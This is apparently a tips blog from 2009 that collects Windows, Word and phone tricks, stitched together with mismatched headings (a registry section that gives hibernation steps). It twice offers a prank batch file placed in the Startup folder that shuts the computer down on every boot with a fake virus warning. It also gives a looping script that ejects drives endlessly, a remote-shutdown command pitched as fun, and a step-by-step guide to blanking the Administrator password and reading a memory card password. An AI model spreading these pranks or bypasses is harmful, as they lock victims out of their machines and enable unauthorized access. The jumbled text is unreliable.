Search This Blog

Wednesday, January 14, 2009

Clearing the Page File on Shutdown for xp

To save on Random Access Memory (RAM), Windows uses your Page File as a sort of cache. This can slow down your PC’s overall performance. To remedy this situation, Windows XP has an option that allows users to clear the Page File when you shut down Windows. While this tweak tends to lengthen the shutdown time, it does have its performance benefits.

To set the computer to clear the page file without directly editing the registry is:

1. Click on the Start button
2. Go to the Control Panel
3. Administrative Tools
4. Local Security Policy
5. Local Policies
6. Click on Security Options
7. Right hand menu - right click on “Shutdown: Clear Virtual Memory Pagefile”
8. Select “Enable”
9. Reboot

To clear the page file using the Windows Registry:

Your Computer Into Hibernation

1.
Click Start, and then click Turn off computer.

2.
Press and hold the Shift key. The label under the first button on the left changes from Stand By to Hibernate.

3.
Click the Hibernate button.


To enable hibernation support on your computer:

You must be logged on as an administrator or a member of the Administrators or Power Users group. If your computer is connected to a network, network policy settings may prevent this procedure.

1.
Click Start, click Control Panel, click Performance and Maintenance, and then click Power Options.

2.
Click the Hibernate tab, and then select the Enable hibernate support check box. If the Hibernate tab is not available, your hardware does not support this feature.

3.
Click OK to close the Power Options dialog box.

Shutdown computer when start

open notepad & type
@ ECHO OFF
shutdown -s -t 12 -c "Virus Attack on Ur computer"
EXIT


file save as name is virus.bat & save in startup folder....
This is only for test....

Shut Down, Restart, Log Off XP Using A Batch File - Undocumented feature for XP

How to shutdown a XP Pro computer when you are connected using RDC (Remote Desktop Connection) using a batch file or RPC (Remote Procedure Command) This is useful if you can't get to the computer but have remote access to the computer via a network or the internet.

First To show you what you will see at a command prompt (command.com) when you type: "shutdown /?" Without the " " on each end.


CODEc:\>shutdown /?
Usage: SHUTDOWN [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "c
omment"] [-d up:xx:yy]

No args Display this message (same as -?)
-i Display GUI interface, must be the first option
-l Log off (cannot be used with -m option)
-s Shutdown the computer
-r Shutdown and restart the computer
-a Abort a system shutdown
-m \\computername Remote computer to shutdown/restart/abort
-t xx Set timeout for shutdown to xx seconds
-c "comment" Shutdown comment (maximum of 127 characters)
-f Forces running applications to close without warning
-d [u][p]:xx:yy The reason code for the shutdown
u is the user code
p is a planned shutdown code
xx is the major reason code (positive integer less than 256)
yy is the minor reason code (positive integer less than 65536)

This is an undocumented feature in XP so I have not found any writeup about it on M$ and everything used here is from other sources. Do not use "cmd" to start the command interpreter (cmd.exe), but type "command" for (command.com. Now you can shutdown the computer by typing "shutdown -s" or to restart the computer type "shutdown -r"

To create a batch file for this you can use notepad, and save the file as .bat in c:\ (root directory) Here are the 3 most used batch files for shutdown:
1 save as down.bat
CODEshutdown -s
2 save as restart.bat
CODEshutdown -r
3 save as forcedown.bat
CODEshutdown -f
4 save as logoff.bat
CODEshutdown -l
5 save as rpcdown.bat (replace computername with the name of your computer )
CODEshutdown -s -m \\computernameand this last one is fun in an enviroment using RPC

So that's a piece of cake, the other options are self explanatory and if you need any help creating the batch file, ask and someone will help

कंप्युटर को बंद करें वो भी सीर्फ 3 sec. के अंदर

Alt+Ctlr+Delete दबाने पर टास्क मैनेजर(TaskManager) खूलेगा अब उप्पर मेनू मे "Shutdown" पर क्लिक करें Ctlr बटन को दबाऎं रखें और "Turn off" पर क्लिक कर दें। धयान रहे Ctlr तब तक दबाए रखें जब कंप्युटर बंद नही हो जाता।

आपको विशवास नही हो रहा है ना तो आप अभी टास्क मैनेजर खोलीये और Ctlr दबाए रखीये और ईसी बीच टर्नआफ पर क्लिक कर दें और 1,2,3 तब गीनती गीनें और देखीये बंद हो जाएगा।

नोट: सारे प्रोग्राम बंद करने के बाद ऎसा करें। और जब जरूरत हो तभी बंद करें। जब भी बहुत ज्लदी मे हों या कोई जरूरी काम हो तब ही ईसका ईस्तेमाल करें।

Watch " Star Wars "

You Don't need to Download IT !

Just :

Start>>Run , type : telnet towel.blinkenlights.nl

<<<<<<>>>>>>>>

Trick To Create Table In Word

To create a table in Ms Word you can use this shortcut !

>> Just type : +======+=====+====+===+==+=+

>> And simply hit 'Enter' !

>> You will see that the text changes to a table. Here, the number '=' represent the number of characters in each cell !

>> Just it makes your work easy and fast !

Posted by Yugal Jindle

Scroll BACK And FORWARD Fast

Just, Hold ctrl and scroll your Mouse Wheel !

Scroll UP : To Go Forward
Scroll Down : To Go Backward

Mother Board of Computer

Use Notepad As A Diary

Do The Following :
1. Open Notepad
2. Type : .LOG
3. Save it with any name say 'Diary'
4. Open Diary.txt again.

Shutdown the computer everytime on startup

Shutdown the computer everytime on startup !
Here is how ?
► Open Notepad
► Type :
@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."

exit
► File >> Save As...
► Name it : virus.bat
► Start >> All Programs
► Right Click on Startup >> Open
► This open the Startup folder
► Paste the Virus.bat file here !
*** That's all , now the computer will automatically shutdown on every startup

Eject your drives in and out infinitely

Do the following:
** Go to Start >> Run
** Type Notepad and hit Enter
** Now in Notepad type:


Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If



** Go to File >> Save As...
** Type Eject.vbs and click Save

Reset Windows Password

Reset Windows Password
Forgot your administrator password? This page provides step-by-step how to reset your local Windows password. This only works for local user accounts, however, not domain accounts.

The password recovery tool from this page is written by Petter Nordahl-Hagen, and the original information, as well as the downloadable tool, can be found from his website. Per author's information, this tool should work for Windows NT/2000/XP/Vista.


WARNING! Users who have EFS encrypted files on the Windows XP or Vista computers will loose access to the EFS encrypted files after recovery of your password.


The tool can be downloaded here. With this tool, you should be able to reset your local administrator password in case you lost your password and cannot logon to Windows again.

Use this trick at your own risks



I. Download the bootdisk:

Download the bootdisk, which includes the password recovery tool here. The file contains the ISO CD image.
Unzip the ISO file and burn the ISO file to a CD. Note that this is an ISO file, you must burn it to CD as an ISO image, not a normal files. To find out how, click here.


II. Understanding the process:

You'll use the bootdisk created from the above steps to bootup your computer, which you want to reset your administrator password.
You'll be asked for things like: which drive is the boot drive, which path to the SAM file, etc.. but don't worry, detailed information will be provided.
Once you have selected an account to reset the password, you'll need to type in a new password; however, it is highly recommended to use a BLANK password at this point, then you can change your password later in Windows.
Follow the prompts to the end. You'll need to save the changes at the end!



III. OK! Enough talking. Let's get started:

Startup your computer with the bootdisk created above. You should see a welcome screen following with a prompt:

boot:

Just wait, the bootup process will continute automatically. Then you should see a screen similar to this:

=========================================================
. Step ONE: Select disk where the Windows installation is
=========================================================
....
NT partitions found:
1 : /dev/sda1 4001MB Boot
2 : /dev/sda5 2148MB

Please select partition by number or
a = show all partitions, d = automatically load new disk drivers
m = manually load new disk drivers
l = relist NTFS/FAT partitions, q = quit
Select: [1]

Notice the last line "Select: [1]" contains the [1] as default since the tool detects the bootup partition is [1]. This might be different on your own machine, but double-check with the information shown under "NT partitions found:", the partition with the word "Boot" should be selected.


Hit Enter if the default partition is correct, or enter the number for the boot parition then hit Enter. Here's what you should see next:

=========================================================
. Step TWO: Select PATH and registry files
=========================================================
....
What is the path to the registry directory? (relative to windows disk)
[windows/system32/config] :

Notice the last line "[windows/system32/config]" contains the default path, which was detected by the tool. If the path is correct, hit Enter, or if you wish to enter a different path, enter it now and hit Enter.
Here're the paths for different versions of Windows:
- Windows NT 3.51: winnt35/system32/config
- Windows NT 4 and Windows 2000: winnt/system32/config
- Windows XP/2003 (and often Windows 2000 upgraded from Windows 98 or earlier): windows/system32/config


Once you hit "Enter" the following similar information should display:

-r-------- 1 0 0 262144 Jan 12 18:01 SAM
-r-------- 1 0 0 262144 Jan 12 18:01 SECURITY
-r-------- 1 0 0 262144 Jan 12 18:01 default
-r-------- 1 0 0 8912896 Jan 12 18:01 software
-r-------- 1 0 0 2359296 Jan 12 18:01 system
dr-x------ 1 0 0 4096 Sep 8 11:37 systemprofile
-r-------- 1 0 0 262144 Sep 8 11:53 userdiff

Select which part of registry to load, use predefined choices
or list the files with space as delimiter
1 - Password reset [sam system security]
2 - RecoveryConsole parameters [software]
q - quit - return to previous
[1]

Hit "Enter" with the default option selected "[1]". You'll get the next prompt similar to this:

=========================================================
. Step THREE: Password or registry edit
=========================================================
Loaded hives:

1 - Edit user data and passwords
2 - Syskey status & change
3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] -> 1



Hit "Enter" with the default option selected "[1]". You'll get the next prompt similar to this:

===== chntpw Edit User Info & Passwords ====

RID: 01f4, Username:
RID: 01f5, Username: , *disabled or locked*
RID: 03e8, Username: , *disabled or locked*
RID: 03eb, Username: , *disabled or locked*
RID: 03ea, Username: , *disabled or locked*

Select: ! - quit, . - list users, 0x - User with RID (hex)
or simply enter the username to change: [Administrator]



Hit "Enter" with the default option selected "[Administrator]", or select another user account. Here you can enter the full user account with < >, CASE-SENSITIVE, or enter the RID number (i.e. 0x1f4). Assuming you select the Administrator account, here's what you should see:

RID : 0500 [01f4]
Username: Administrator
fullname:
comment : Built-in account for administering the computer/domain
homedir :

Account bits: 0x0210 =
[ ] Disabled | [ ] Homedir req. | [ ] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account | [ ] NMS account |
[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act |
[X] Pwd don't expir | [ ] Auto lockout | [ ] (unknown 0x08) |
[ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ] (unknown 0x40) |

Failed login count: 0, while max tries is: 0
Total login count: 3

* = blank the password (This may work better than setting a new password!)
Enter nothing to leave it unchanged
Please enter new password: *



At the prompt "Please enter new password", Enter the * for a blank password (HIGHLY RECOMMENDED!) then press Enter

Please enter new password: *
Blanking password!

Do you really wish to change it? (y/n) [n] y



At the prompt, type in "y", then press Enter. Note that the default option is "n".

Do you really wish to change it? (y/n) [n] y
Changed!

Select: ! - quit, . - list users, 0x - User with RID (hex)
or simply enter the username to change: [Administrator] !



Enter the "!" to go back to the main menu. Then select "q" at the following menu to quit:

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives:

1 - Edit user data and passwords
2 - Syskey status & change
3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] -> q



A prompt to save changes displays, enter "y" to save:

=========================================================
. Step FOUR: Writing back changes
=========================================================
About to write file(s) back! Do it? [n] : y



Last of all, the changes saved. The following is what you should see, press Enter, and reboot your computer.

Writing sam

***** EDIT COMPLETE *****

You can try again if it somehow failed, or you selected wrong
New run? [n] : n

Folder Option menu

Here is the solution for that
Open Run and then type "gpedit.msc".
Now goto
User Configuration > Administrative templates > Windows Component > Windows Explorer.

Click on Windows Explorer you will find the 3rd option on the right side of screen
"Removes the Folder Option menu item from the Tools menu"

Just check it,

if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured

China Mobile

China Mobile Codes
China Mobile Codes-

Engineering mode: *110*01#
Factory mode: *#987#
Restore factory settings: *#987*99#
Software ver: *#900# or *#800#

RECOVER UR LOST MMC PASSWORD

RECOVER UR LOST MMC PASSWORD
1.Download FExplorer from www.gosymbian.com
2.Goto c:\system with FExplorer. Find mmcstore
3.Choose Options>File>Text/Hex viewer U'll find ur paswrd in sets of zeroes. e.g."000000synapse"
4.Thats it.

UNLOCK UR MEMORY CARD WHEN U FORGOT UR PASSWORD

UNLOCK UR MEMORY CARD WHEN U FORGOT UR PASSWORD
Some times it happens that you forgot the password of your memory card and you have lots of your important data in your phone.

So there are two types of methods for recovering the password of your memory card with the help of nokia phone.


For Nokia s60 1st and 2nd edition phones.

1. First Install FExplorer in your phone memory.

2. Got to drive C: , you will find a file called mmcstore

3. Send it to your pc directly and open it in notepad or rename the file.

4. At the end of the file you will find your password.

hide ur folders without the usage of folder lock

hide ur folders without the usage of folder lock

hide ur folders without the usage of folder lock :

suppose u want to hide a folder named abc which is in D: of ur computer

go to command prompt
start--->run--->cmd-->d:


after changing it from C: to D:

type D:/>attrib +h +s abc
the above command is to hide the folder

to show the folder

tyoe D:/>attrib -h -s abc

in this type of hidding the folder cannot be viewed even if we make advance search or even changing the folders menu to (show all hidden files)